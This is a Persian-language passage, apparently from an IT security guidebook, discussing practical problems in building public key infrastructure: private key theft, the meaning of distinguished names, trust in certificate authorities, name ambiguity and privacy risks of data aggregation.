‫ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﮔﺴﺘﺮﺩﻩ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘﺬﻳﺮ ﺍﺳﺖ‪ .‬ﺗﻌﺪﺍﺩ ﺣﻮﺍﺩﺙ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ ﻭ ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺯﻳﺎﺩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ ‪ PKI‬ﮔﺴﺘﺮﺩﺓ ﺍﻣﺮﻭﺯ ﺑﻨﻈﺮ ﺩﻭﺭﺗﺮ ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۱۹۹۰‬ﻣـﻲﺭﺳـﺪ‪.‬‬
‫ﻼ‬
‫ﺍﻳﻨﻜﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﺑﺮﺍﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻮﺿﻮﻋﻲ ﻛﺎﻣ ﹰ‬
‫ﻲ ﺍﻧﺘﻬﺎﻱ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺼﺪﻳﻖ ﻧﺸﻮﺩ‪ ،‬ﻫﻤﻴﻦ ﻣﺘﺨﺼﺼﺎﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ‬ ‫ﺟﺎ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟ ﹺ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺍﻳﻦ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺭﺩ ﺟﺰ ﺍﻳﻨﻜﻪ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﻧﻬﺎﻳـﺖ ﺳـﺎﺩﮔﻲ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻭ‬
‫ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺻﻔﺤﺔ ﺑﻌﺪ‪ ،‬ﺗﻌﺪﺍﺩ ﻣﻌﺪﻭﺩﻱ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻦ ‪ PKI‬ﻭﺍﻗﻌﻲ ﺑﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﺷﻮﺩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬

‫ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ‪ ،‬ﺧﻮﺩ ﻣﺮﺩﻡ ﻧﻴﺴﺘﻨﺪ‬


‫ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺭﺍ ﺗﺴﻬﻴﻞ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺍﺛﺒﺎﺗﻲ ﺑﺮﺍﻱ ﻫﻮﻳﺘﻬﺎ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺼﻮﺭﺕ‬
‫ﺗﺼﺎﺩﻓﻲ ﺗﻮﻟﻴﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﺸﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻜﻨﻔﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻛﻞ ﻳﮏ ﻓﺮﺁﻳﻨﺪ ﻣﻮﺭﺩ ﺗﺮﺩﻳﺪ ﻭﺍﻗﻊ ﻣﻲﮔـﺮﺩﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻢ ﺗﻮﻟﻴﺪ ﻭ ﻫﻢ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮ ﻧﻬﺎﻳﻲ ﺭﺍﻳﺎﻧﻪ ﺍﺳـﺖ‪ ،‬ﻭ ﻣـﻲﺩﺍﻧـﻴﻢ ﺑﻴـﺸﺘﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ‪Netscape‬‬
‫‪ Navigator‬ﻳﺎ ‪ Internet Explorer‬ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ ﺍﻳﻤﻦ ﻧﻴـﺴﺘﻨﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺭﺍ ﻛـﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ‬

‫‪146 Distinguished Name‬‬


‫‪٣٢٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪ download‬ﻛﺮﺩﻩﺍﻧﺪ ﺑﺪﻭﻥ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﺍﺯ ﻣﻨﺒﻊ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﻫـﺴﺘﻨﺪ‪ ،‬ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ download‬ﺷﺪﻩ ﺣﺎﻭﻱ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺭﺍﻳﺞ ﺩﭼﺎﺭ ﺍﺷﻜﺎﻻﺕ ﺟﺪﻱ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﺻﺪﻫﺎ ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﻃﻲ ﺳﺎﻟﻴﺎﻥ ﮔﺬﺷﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺻﺎﺩﺭ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﭘﺲ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣﺘـﺼﻞ ﺑـﻪ‬
‫ﺷﺒﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﻧﺰﺩﻳﻚ ﺑﻮﺳﻴﻠﺔ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩ ﺍﺯ ﻛﺎﺭﺗﺨﻮﺍﻧﻬﺎ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺳﺮﻗﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻤﻲﺳﺎﺯﺩ‪.‬‬

‫ﺍﺳﺎﻣﻲ ﻣﻤﻴﺰﻩ‪ ،‬ﺧﻮﺩ ﻣﺮﺩﻡ ﻧﻴﺴﺘﻨﺪ‬


‫ﺣﻔﺎﻇﺖ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ‪ PKI‬ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺻﺤﺖ ﻭﺍﻗﻌﻲ ﻧﺎﻣﻲ ﻛﻪ ﺭﻭﻱ ﻗـﺴﻤﺖ "ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ" ﺁﻣـﺪﻩ ﺭﺍ‬
‫ﭼﮕﻮﻧﻪ ﺗﺸﺨﻴﺺ ﻣﻲﺩﻫﻴﺪ؟ ﻫﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻌﻬﺪ ﻣﻲﻛﻨﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻛـﺴﻲ ﺭﺍ ﺗﺄﻳﻴـﺪ ﻣـﻲﻛﻨـﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺍﻋﻼﻡﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻮﺩ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ‪ .‬ﺍﺯ ﻛﺠﺎ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺁﻥ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺍﺳـﻢ ﻣﻤﻴـﺰﺓ‬
‫ﺭﻭﻱ ﮔﻮﺍﻫﻲ ﻭﺍﻗﻌﹰﺎ ﻣﺘﻌﻠﻖ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻣﺘﻌﻠﻖ ﺑﻪ ﺍﻭﺳﺖ؟‬
‫ﭼﮕﻮﻧﻪ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻨﺪ ﻳـﺎ ﺑـﺎﻟﻌﮑﺲ؟‬
‫ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﻨﺎﻓﻌﺸﺎﻥ ﺍﻗﺘﻀﺎ ﻛﺮﺩﻩ ﭘﺎﺳﭙﻮﺭﺗﻬﺎﻱ ﺟﻌﻠﻲ ﻫﻢ ﺻﺎﺩﺭ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺁﻳﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻳـﻚ ﻣﺮﮐـﺰ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﻫﻢ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺯﻳﺮ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻭ ﺍﺳﻨﺎﺩ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺎﻋﻼﻧﻪ ﺻﺎﺩﺭ ﻛﻨﺪ؟ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭼﮕﻮﻧﻪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﮐـﺰ‬
‫ﺭﺍ ﺑﺎ ﻳﮏ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﻳﮕﺮ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺑﻌﻀﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﻣﺸﺘﺮﻱ‪ ،‬ﮔﻮﺍﻫﻴﻨﺎﻣـﻪﻫـﺎﻱ ﺷـﺨﺺ‬
‫ﺛﺎﻟﺜﻲ ﭼﻮﻥ ‪) ١٤٧SAS 70‬ﮔﺰﺍﺭﺵ ﻣﻤﻴﺰﻱ ﺧﺪﻣﺎﺕ(‪ ١٤٨‬ﻳﺎ ‪ WebTrust‬ﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪) ١٤٩‬ﮔﺰﺍﺭﺵ ﺗﺼﺪﻳﻖ(‪ ١٥٠‬ﺭﺍ ﺍﺧﺬ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﻛﻤﻴﺘﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﻤﻦ ﺑﺎﺭ ﺁﻣﺮﻳﻜﺎ‪ ١٥١‬ﻛﺘﺎﺑﻲ ﺑﻨﺎﻡ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ‪ ١٥٢PKI‬ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ‪ ،‬ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩﻱ ﻣﻬـﺎﺭﺕ ﻭ‬
‫ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﻧﺮﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻲ ﺍﻋﺘﺒـﺎﺭ ﺣـﻞ‬
‫ﻲ ﺷﻨﺎﺳـﺎﻳ ﹺ‬
‫ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﺆﺍﻻﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻣﻤﻴﺰﻱﻫﺎ‪ ،‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺳﻤ ﹺ‬
‫ﺷﻮﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺧﻠﻖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻣﻘﺮﺭﺍﺕ ﻧﻴﺰ ﺑﻬﺮﻩ ﮔﺮﻓﺖ؛ ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ‪ ،‬ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﺎ ﺍﻣﺮﻭﺯ ﭼﻨﺪﺍﻥ ﺍﻣﻴﺪﺑﺨﺶ ﻧﻴﺴﺘﻨﺪ‪.‬‬

‫ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‬


‫ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻧﻮﺷﺘﻪ ﻣﺘﻌﻠﻖ ﺑﻪ "ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖ" ﺍﺳﺖ ﭼﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺍﺯ ﻛﺠﺎ ﻣﻲﻓﻬﻤﻴﺪ ﻣﺘﻌﻠﻖ ﺑﻪ ﻛﺪﺍﻡ ﺭﺍﺑﺮﺍﺕ ﺍﺳﻤﻴﺖ ﺍﺳﺖ؟‬
‫ﺭﻭﺷﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﻴﺶ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﻧﺎﻡ ﺍﺯ ﻓﺮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻳﻌﻨـﻲ ﺷـﺎﻣﻞ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﺣﻘﻮﻗﻲ ﻭ ﻳﻜﺘﺎﻱ ﻓﺮﺩ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ )ﻓﺮﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑﻪ ﮔﻮﺍﻫﻲ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ( ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺗﻜﻤﻴﻠـﻲ ﺭﺍ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻧﺪﺍﻧﻴﺪ ‪ -‬ﻟﺬﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﻫﻨﻮﺯ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺩﺍﺭﺍﻱ ﻗـﺴﻤﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﺳﻦ‪ ،‬ﺟﻨﺲ‪ ،‬ﻳﺎ ﻋﻜﺲ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧﺪ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﮔﻔﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺍﻳﻦ ﺷﻨﺎﺳﻪﻫﺎ ﺑﺪﻭﻥ ﺭﺿﺎﻳﺖ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﻧﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺁﻧﻬﺎ‬
‫ﻣﻮﺭﺩ ﺗﺠﺎﻭﺯ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﺍﻟﺒﺘﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺣﻖ ﺑﺎ ﺁﻧﻬﺎ ﺑﺎﺷﺪ‪ .‬ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲﺗﺮﻳﻦ ﻧﻘﻄﺔ ﻗﻮﺕ ﻛﺎﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺳﺖ‪:‬‬
‫ﺣﺬﻑ ﮔﻤﻨﺎﻣﻲ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻔﻆ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻥ ﻫﻮﻳﺖ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ‪.‬‬

‫‪ ۱۴۷‬ﺳﻴﺎﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻤﻴﺰﻱ ﺷﻤﺎﺭﺓ ‪Statement on Auditing Standards) ۷۰‬؛ ‪ (SAS‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺧﺪﻣﺎﺗﻲ‪ ،‬ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺣﺴﺎﺑﺪﺍﺭﺍﻥ ﻋﻤﻮﻣﻲ ﮔﻮﺍﻫﻲﺷﺪﻩ ﺁﻣﺮﻳﻜﺎ )‪American Institute of Certified Public Accountants‬؛ ‪ (AICPA‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﻳـﻚ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫‪ SAS 70‬ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﻣﺆﺳﺴﻪ ﺧﺪﻣﺎﺗﻲ‪ ،‬ﺍﻫﺪﺍﻑ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﻮﺩ ﺭﺍ ﺗﻮﺳﻂ ﻳﻚ ﺷﺮﻛﺖ ﻣﺴﺘﻘﻞ ﺣﺴﺎﺑﺮﺳﻲ ﻭ ﻣﻤﻴﺰﻱ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺗﺄﻳﻴـﺪ ﺭﺳـﺎﻧﺪﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫‪148 Service Auditor Report‬‬
‫‪ ۱۴۹‬ﺗﺤﺖ ﮔﻮﺍﻫﻲ ‪ WebTrust‬ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﻳﻚ ﻣﻤﻴﺰ ﻭﺍﺟﺪ ﺷﺮﺍﻳﻂ ﻭ ﻣﺴﺘﻘﻞ‪ ،‬ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺍﺻﻮﻝ ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳﺎ ﻳﻚ ﻣﺮﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻓﻌـﺎﻝ ﺍﺯ‬
‫ﺷﺮﺍﻳﻂ ﺣﺪﺍﻗﻞ ﺍﻓﺸﺎ‪ ،‬ﺧﻂ ﻣﺸﻲ‪ ،‬ﺗﺠﺮﺑﻴﺎﺕ‪ ،‬ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪.‬‬
‫‪150 Attestation Report‬‬
‫‪151 American Bar Association Information Security Committee‬‬
‫‪152 PKI Assessment Guidelines‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٢٨‬‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ‪ ،‬ﺗﺠﻤﻴﻊ ﺩﺍﺩﻩ ﺭﺍ ﺳﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‬


‫ﻃﻲ ﺩﻭ ﺩﻫﺔ ﮔﺬﺷﺘﻪ‪ ،‬ﺷﻨﺎﺳﺎﻧﻨﺪﻩﻫﺎﻱ ﺟﻬﺎﻧﻲ ‪ -‬ﻣﺜﻞ ﺷﻤﺎﺭﺓ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ‪ -‬ﺗﺒﺪﻳﻞ ﺑﻪ ﺍﺑﺰﺍﺭﻱ ﺑـﺮﺍﻱ ﻧﻘـﺾ ﻧﻈـﺎﻡﻣﻨـﺪ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺷﻨﺎﺳﺎﻧﻨﺪﻩﻫﺎﻱ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺠﻤﻴﻊ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺑﻊ ﻣﺘﻔﺎﻭﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻭ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﻓﺮﺍﮔﻴـﺮﻱ‬
‫ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺻﺎﺩﺭﺷﺪﻩ ﺍﺯ ﻳﻚ ﻣﻨﻄﻘﺔ ﻣﺮﻛﺰﻱ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭﻱ ﺑﺴﻴﺎﺭ ﺑﻬﺘـﺮ ﺍﺯ ﺷـﻤﺎﺭﺓ‬
‫ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺮﺍﻱ ﺗﺠﻤﻴﻊ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺷﻨﺪ‪ ،‬ﭼﻮﻥ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺿﻌﻒ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ‪ -‬ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ ‪ -‬ﺭﺍ ﺭﻓﻊ ﻣـﻲ‪-‬‬
